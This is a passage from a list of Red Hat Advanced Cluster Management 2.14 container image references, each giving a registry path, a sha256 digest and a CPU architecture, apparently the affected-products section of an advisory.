"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:11028e9f630af725dceed505e101d54b75ba978cb14607f9940af75f867aa639_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:528d1a9167e0c4b2c5f2dcffe9a96970a92a3df134b76eb4fbeaa5b9cba9f3f1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:66774f0dd04cd3f3f8939e60cc89c98f2a9082f3617999d1c2a3e46ae461f7e7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:f1293017bb56a08f22a0ecd3785e8fea7c6dd9592583fabebbc4c6c3a1ed2cd5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:6ce4f2f4e95e49e027d38d76e00e6ab05481389a2f1d7646f0741ca371a93869_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:71a403581e9fb13da9679af97d53daea1efa06142c503b659a07e7ddda0c39cd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:91c016b3065808ddbceea1d6358a3a6c79480e41cdfe98e0f210af9dedb7a4ca_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:add985bc8ec3f3d6d57266ed76509e0f9b7df16bf3cb698a60f9929ae441d50f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:646a6afc52c83362e32549a0ec09ff4d0677a239ec2b58a82e4374ee3b38053b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:7566bd3c569a92b3540e44a31ef49e7dc9934254d457ec1e36d97824a1b7c82c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:7fdb6e7d3859f06c4e6685853ae34f74f99daac5ba70ae2c3692bc7202a12c8c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:fdd3dc61d0214588fdfdc0260cd75c395e02615bc73633d84184dee02effe404_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:47b07ed00366723b4063957769aaefc49b4bbcd4bcf14bf675b653db5a10ab01_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:9726ba85bc1d7ec79758e46d6f28ae8ecacd6d1be21c56af9b795aa15bd07f7e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:c0ce3946e9aa446e8b8edca27e489ddd2dd7cf997da4951dce7d8be153ab5a08_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:fe2a087063e5f7fb0b140e4b6b7631df3c6052e9c36659068a48631da4781a88_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:08070208d69530bb849be1ac083d9f1affb1363232a2f589e839c09148c7bec0_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:5f225c8b7cec9c965cdfefdfcc34371b1dbd3a39d1e6a74f121ef9feffcb4f11_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:b4cd50768238d29e719a60e98dba61d24ba70dd9d04d7410536ee629ec62c4fe_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:c04d51be3f48aff9d8741b0e4be39497d89265b85f029487ab52440efe0f28f7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:1740b9e687e829ddc242fa400cf496ce94bdd875de8e9a83589f540231770016_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:ba7ccd4485603b4ec39569b8e87122de610a6775f022f53e1150db0dbdbe2bcf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:d47624803ffd462eacd0454c07ba5f000cd1e0e6658c595b936eca5441f49a1e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:f87d0e73a50771c6ae322ba9aefc826a87910e3ffc64473a98ce197a30bd2647_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:0fcfb11a3e8fd162b15b81bb5133549e8f21139ade68e4a66f0d1f216edc09bc_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:74a11d641af79fe69be111135609e0d22562fd01ef95343c133d1a2ee527079a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:86392c4f03ba2eec91ccbc75a0679f91e38cbd1ccf3aa55e6f942d664a254213_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:94b9d0a6720165c916fdb14a4f891f22861e95544e13d2ff706a4547c60e207a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:5559d75fc24f1251b934563e4e98090df535dbfb0218a8f4135e8ecb6c4544a0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:738a4ebc0b24bdb00ac386ecffaa74c9cf71fd5cd3023671509899ba481c09d4_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:96cf5d8b47c5c6c30ed4ca119f02b6e8df2952788db6508663618cf779ebe00a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:fee7a4ef5d73d6e81e0b913a0c15ed8254f138ba8115fae8c3819a2cc6144fdc_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:241781caa54f27677f1494b8f55bbacef14751fe686f1410534a5d48de010679_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:4f6436c0a8aed6c7cdf9322c312e61f551365d6c2f7680765aa83ef19f21af8a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:84fec9caf52a3f3e7e1d946345c995c7db53f8797ac45921a2caf021e49b1d6a_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:9aa65853e2ab9469cbce3dc8dd5b40c6a19f844c2f07eb2657639b56afdc6b3b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:857f48a392757a6fec8a26bddc7bccffa463c33c5824bf8a809784e5b06f9cb1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:be40e3b9e6f7e8ea857b906e82e8ffc713fbd9b3f4016711a8158f5054d951fb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:e951334f9a85760ad85e96695e35ff045ea274ca0203a96ef7394d4905379325_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:ea69db2fd8c7ce3e39af7997a83812dd97b7fec6fce3d6776ec652b81fd3b7cf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:3fd793aaa8b22670c9a863613bd20e1fbbd946b8a15bc684bb952364d98a0c28_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:5c3b02c97bc9d3383b69157f98c8e9091905973af181692a11caf414ca366331_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:719f5cfdb6fbac0903e350e7df9e983dbd4109a83055b335db3b7895353f64c0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:eda1cbe6851aa6fb1921e11a8c608d22210a8f63c9fe145e8f5ae0eb585b6cce_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:2da0d50b3c91414f3e58dfacf6f47f8770790d16b70d55afb1d291533575ab85_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:b8854dbea48fdc080a446859dbf92cbe5cf3dbd25959a5c0608ebe3a8222b031_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:cfd3cf79f22ec65643a9637779ac200ca33784f9f558ea233de05597396fe65c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:dfc54b25aeb5826df80d9f98031bd2675065e25cb3ae8692871478cae5194973_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:45a3b742df7e286cbf840e32285b281803f9e97f579af9721f9f9ae00bd2c824_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:580a0307f5881f91950436573a17854ecd339045f60a88f5bd18adeecb5b0ca9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:607796d67b50b70e54520428d0b2a1e53b604dae9395ce7a011e57787562de89_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:b5445243950f037d7932cdfef65443df4558717a782712ea3dfa792bbc18891a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:08f1c3f4bbd371a46fdbd696026a9509053e4c091d591f8c92e32ed5590b432e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:47f7aa6cfb685cf9d533ef3b505ede5c614e2837513bfe3f68b76c3f650ca240_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:d739b5a788d6888fb970f44d03869467731d8d03a34f271cebeb31e0e34edddd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:d978057f781d3ef887909cab4211f892017e76de317f3d2f17cd6314ec883939_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:212e04293273e80955e59c3346933abc016ffa23c6072718b98b918ac07d6a1c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:505f4d5caff4451c781320044f2b01968fafa1a7b2c4734627f9778526c06494_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:b7aa114127474db733d9f4080d2770a48e13dc8971b483aec36d0227a7e2c22c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:e3d2d1e3d4467a8ee296180442f093643d07e2fe1f9c99b683ea69942d53c997_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:1b56fc6c4b897bb8a62b1fa176af6bace8282b2de38e3e69b5673c5ae3e6848c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:55dd4696828ab8a7546481b8124406d858b9a43563e14599d06f5e5b1ac030f5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:c13595e478ea28b6ba8d146d5a93c6f271babf253653d914139000e5af34d022_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:e780559caf89469f58e9d6646c389031a4cb080853aad7d471a5e7339c39f28c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:263dcdd063b32734cead282523078f3365e8ff793eabe18c95207316bf2dbf77_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:2d5dd95834e1cac3c33a22708c97fccd17e6a5891cfb9cf07d61caab399322df_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:9f7cc4bc6e4019ec9b9e9b72f469902e54befa09560c1d1a1928ab1de5716ce1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:dcdecabafdeba7adbf11f25eb4271dc69a7726216f52948bb26527ac5c1bab6f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:42122cf17900940fba0ba140e4983eb2ced2f0001792501b99523fd6b7960335_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:495c5326c40792227be26ef78244a0f72cbf3124c843a68cc07e724abac5b31e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:5ff93565951e58d1c3d181897f20efe5cbd1f0f902e050fc460b5dc91d4d1d82_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:76718e6fe4d575e6348dac6ebc9a892cc1dd7da3b762cbd8965bd339862e5541_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:3fda89fe951abce23fecf4c0c6ecedda9f3da6e7639acf4be4160ab329dfdded_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:60e15cb9653139f0f1675141486f5c5d79b4665a94416d589381fee7a0bbdc80_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:b19fbb7547999ff5e4144eebf4f57e8c3d310ae8f4b901a47d80b098cccb30b2_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:f014d27ed18d8258823f81fa5795530720ac21b355283c966b44943f04ca2f37_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:246de6f5a2a64d0f625e3af6fcfba5000ce3d1f60bee7b996c8571f0dff4917c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:2ed7d15730c178aad5f3d7838f347f540e3f710e414c78af82f0715d57b7a9f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:73f5e95e4c2f259920af40a8f28db82251735a6e2047da0feb9c91411c5f55d5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:c069f2f718598344b42e8472887f075042bc75bc1dc52a1f1248b5558189ee9a_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:7bff1645296326504b40e17540b4b4c2e5aa86147799b61d1bda5757305d3683_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:b2bf3ec7254afae3ff1fb0713e336cd4b58fc734f6439ccdc0bb659e939db885_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:d8f0bb2246c301858cad1107e166466bd3df41817e245d9955ca2a441866bd23_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:fd17f3004739a206ae4535baf78c2a6ddb1bb4414bf5e63a273234a15acfa700_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:6140280d31900679f69fcc045db8ba3d100301367f21855f9082fe4e271a0001_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:6d05e38770288d8f99b7074d631e7b8f8a634a2bf6fc15c4cd1a3483907b7ac2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:cab194af8737d2a74ccf5c7ae6d192651e97ffec64625f7508c53a5094407769_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:e1b5cef5a6520c63293afc51e6d249cf70d146d37cd8acf544f0071cac6a6f3c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:1eaf7740de439ed0f26e7abe5186d6422ad0304e7f7a62ff8f7d8b20d7b5f0ef_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:3521a37cfcc56e8766e5c0dca7c90d6a3f2cd11441b5cf3be6ce1b76b9f8831f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:e11fa23f27e11118273b98b57137f42dbbea9b18df0a55e674662cb12522bae5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:f72518ff3ebba68ae438066db03dccaa7656d2781542b00f7243c4800ecbaeb2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:7e394d47079a8bbe2a4a1f158725ddb6b6c7c184c48ee22dd8873b1b8e4e642f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:9dc8efe7f5e8e7b1ccacdd9e2feddf4fb90432e61f8fa9f7229e320ab0ee800d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:b4e6f98aaf08e97ce0eb68952ee9f5528944cfb38e90274e948b66e2f6ef048c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:b535b044f4233c17aa133a1e457424a9999369284a3a91ff61bc04a798079295_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:2f4d26918cf42cad318cc95935e4637e3912ef4454e91fa0e8f1d42dc185e8b6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:59f1ee894fc44d0c3bd9e802b70b7d0a8b021ae703c77468898172d6d36d5a27_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:d90541f7b7746118a800776cfe26ccfffb99862bdcda46b4ddabb1669d22f7cf_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:e5e7d3e715c21d58322704974d82acd21bf33b87ad4218d32a7c478e1efc8bf8_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:3b48adab9d8de5c45c2c64686adf99581938cecd9f5ef06016cebdfb174066aa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:8866805ca112c1b7c51f293d02804b7f29a581ea2720b2fbbe22e7f9030f854a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:9d28ff996ca8d0f54c86f57c8159cf62658d5a2a851270a013d6a0679989c683_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:bd5ab0e749d8ede45d643bcb3578a3d9187d944b54aab5f2f1bc3216c2bfa828_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6c9da700984d3199a85792c6eabfb36501843abf79f14d1a1312cb8b195100ec_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:8709a7a821634c247d72df2d0c4341673f88bf87e4287e903d4f042f5ece6222_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:abccf69a9e98797e9e0aa25a12d086bf0ff3e9c447de871a681c719896c78f3a_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:ef98266522a2aa4caf442b42dbf64a9f49cf3ef746c25947fc0368dd373c1b43_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:04b85e82af2367c390b8c27beac3df0a3d17a4114eaf8345715949e76b850c7d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:5e8b6dcca8daba99087b2ab18c19c9da07d6b8850ca596a3decd8a26a049ea84_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:84a20b1a3c8240b9535975d2266a84eab22ddd6bba9c11aa8aaea5bf542b6c05_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:d9aef7d13b8fe266a3cef070df811bc790c0a3430ead2f048664fd2e37a6d76b_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:27fd4853b405d8075ae127ab75205f77a08565bdc2746dffc615141e9ff22e06_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:44b5c9b82ab30240cff679ced486e1d0660722992375065e7a997a29807c220f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:4cb90416465a8de08582fc5c90d73b8c796a8384be8fbd77797a1fdc8d2b5348_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:736d1c14872440c8973acbe47b42249958277ce20d743d86a8d65c932ae257e0_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:36871ffe49e522c8f838fd804675bca1fb325d94cef2abdc03650b0754fee4e7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:bf39aca4041bc20fecc14e0158462f3368755af4cdf92c278ed654d92b0a5ec4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:df47c41ea438bd520e45eea9d43cacde61617fae28f5e90ea38d7462ad4e233c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:f1b763117e203efefeed33b28135a535732d02bf563ebfb740b31b0a0106d662_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:5f7390b5f48371553c718dd00dc51fd646d57994f299b1ac6d80ae3be1d4591f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:7bad802bf7b204d29cedb35c4a63143b2d32e5d6961514327a1cc14fe16d48ad_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:a1896f5f7d19945fe045b3f148c1802fa05bf6cb2d029d57a6ad618984f9b213_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:f7bd358a85922350de6f9f4dbf91a473ca51f245f2ddbc941388bc94fb05d33e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:370c2024529902a32cb9e82d3dc793a0e5ac9de8a5345e58674078074f7222a6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:45b898ff7eb7b5a298577ca16829e9554f179a25609e72874a8fde9ef0d892fd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:82f99122cfc73a9f43ab1f03ffb819bf8a0eccfa07bfebb145fdb883a36f03de_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:bf8857a8967922ece490e8fcde410c3efb21ebaac48a4346011ded390d763170_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:6e91b713e6d6b965b9bb5e5ba5ae37a487fe73fb18b59e7f2b8ee89ebe52f212_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:80f8f269b175dfbecc4c21c39b6385e4fc0939a0e5297e580213412f558ac583_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:b7c83aef590284b867aa6050b5c206a7b81a2a2dfad8477cbc3b143e368c3636_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:e4d4a45a7bb882f5d60acde0cdd2bb6e092ba50dc709b484a513d1399bef18d4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:28072f029e61aa7fdfef70a767f5c809775dddaef337d6bfe48ec25f7839a184_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:2b5b2a26f35f6ebd7bc921ceecbdb16c55d1e03337c74a9d2e271be4635066ee_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:3b667400920c96bb5f69c9a8d0510993c084ba6604d43be233d217c83f6a2e67_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:865e35a99ab1efd55b6cec986cc170859baf895306bf86c730f818f51b548b39_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:0016866635c4b9a24072275ec416ecc38df049edcea177611a12d1aef4394b43_amd64",
